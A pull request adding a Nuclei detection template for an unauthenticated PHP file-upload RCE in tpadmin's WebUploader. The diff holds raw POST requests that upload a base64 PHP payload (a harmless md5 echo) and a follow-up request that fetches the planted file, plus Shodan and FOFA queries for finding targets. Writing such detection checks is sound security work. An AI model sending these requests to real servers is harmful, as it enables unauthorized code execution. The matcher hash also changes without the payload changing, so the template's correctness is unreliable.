### PR TITLE
Add CVE-2026-2113 - tpadmin WebUploader RCE template

### DIFF
--- a/http/cves/2026/CVE-2026-2113.yaml
+++ b/http/cves/2026/CVE-2026-2113.yaml
@@ -1,0 +1,57 @@
+id: CVE-2026-2113
+
+info:
+  name: tpadmin <= 1.3.12 - Remote Code Execution via WebUploader
+  author: jankesec
+  severity: critical
+  description: |
+    yuan1994 tpadmin up to version 1.3.12 is vulnerable to Remote Code Execution via unrestricted file upload in the WebUploader preview component (/public/static/admin/lib/webuploader/0.1.5/server/preview.php). An unauthenticated remote attacker can submit base64-encoded PHP payloads leading to arbitrary code execution with web server privileges.
+  impact: |
+    Unauthenticated remote attackers can execute arbitrary PHP code on the server, leading to full system compromise.
+  remediation: |
+    Delete or restrict access to the preview.php script or upgrade to a patched version.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-2113
+    - https://github.com/yuan1994/tpadmin
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-2113
+    cwe-id: CWE-434
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: yuan1994
+    product: tpadmin
+    shodan-query: http.html:"tpadmin"
+    fofa-query: body="tpadmin"
+  tags: cve,cve2026,tpadmin,rce,fileupload,webuploader
+
+http:
+  - raw:
+      - |
+        POST /public/static/admin/lib/webuploader/0.1.5/server/preview.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        data:image/php;base64,PD9waHAgZWNobyBtZDUoJ2N2ZS0yMDI2LTIxMTMnKTs/Pg==
+
+      - |
+        POST /static/admin/lib/webuploader/0.1.5/server/preview.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        data:image/php;base64,PD9waHAgZWNobyBtZDUoJ2N2ZS0yMDI2LTIxMTMnKTs/Pg==
+
+    stop-at-first-match: true
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "53b4ca6469cf24da27a5d93e87fc4dc8"
+
+      - type: status
+        status:
+          - 200

--- a/http/cves/2026/CVE-2026-2113.yaml
+++ b/http/cves/2026/CVE-2026-2113.yaml
@@ -25,7 +25,7 @@ info:
     product: tpadmin
     shodan-query: http.html:"tpadmin"
     fofa-query: body="tpadmin"
-  tags: cve,cve2026,tpadmin,rce,fileupload,webuploader,intrusive
+  tags: cve,cve2026,tpadmin,rce,file-upload,webuploader,intrusive
 
 flow: http(1) && http(2)
 

--- a/http/cves/2026/CVE-2026-2113.yaml
+++ b/http/cves/2026/CVE-2026-2113.yaml
@@ -1,7 +1,7 @@
 id: CVE-2026-2113
 
 info:
-  name: tpadmin <= 1.3.12 - Remote Code Execution via WebUploader
+  name: tpadmin <= 1.3.12 - Remote Code Execution
   author: jankesec
   severity: critical
   description: |
@@ -11,8 +11,8 @@ info:
   remediation: |
     Delete or restrict access to the preview.php script or upgrade to a patched version.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2026-2113
     - https://github.com/yuan1994/tpadmin
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-2113
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
@@ -25,7 +25,9 @@ info:
     product: tpadmin
     shodan-query: http.html:"tpadmin"
     fofa-query: body="tpadmin"
-  tags: cve,cve2026,tpadmin,rce,fileupload,webuploader
+  tags: cve,cve2026,tpadmin,rce,fileupload,webuploader,intrusive
+
+flow: http(1) && http(2)
 
 http:
   - raw:
@@ -45,12 +47,35 @@ http:
 
     stop-at-first-match: true
 
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"jsonrpc"'
+          - 'preview/'
+        condition: and
+        internal: true
+
+    extractors:
+      - type: regex
+        name: preview_path
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - '"result" : "https?://[^/"]+(/[^"]+\.php)"'
+
+  - raw:
+      - |
+        GET {{preview_path}} HTTP/1.1
+        Host: {{Hostname}}
+
     matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
-          - "53b4ca6469cf24da27a5d93e87fc4dc8"
+          - "8d545c3577fdfbf5ae9e254ca893a0ef"
 
       - type: status
         status:


### PR DESCRIPTION
### PR Information

- Added CVE-2026-2113 (tpadmin <= 1.3.12 WebUploader Remote Code Execution)
- References:
  - https://nvd.nist.gov/vuln/detail/CVE-2026-2113
  - https://github.com/yuan1994/tpadmin

### Template validation

- [x] Validated with `nuclei -validate` (Syntax and schema passed successfully)
- [x] Validated with unique md5 execution hash matcher to prevent false positives.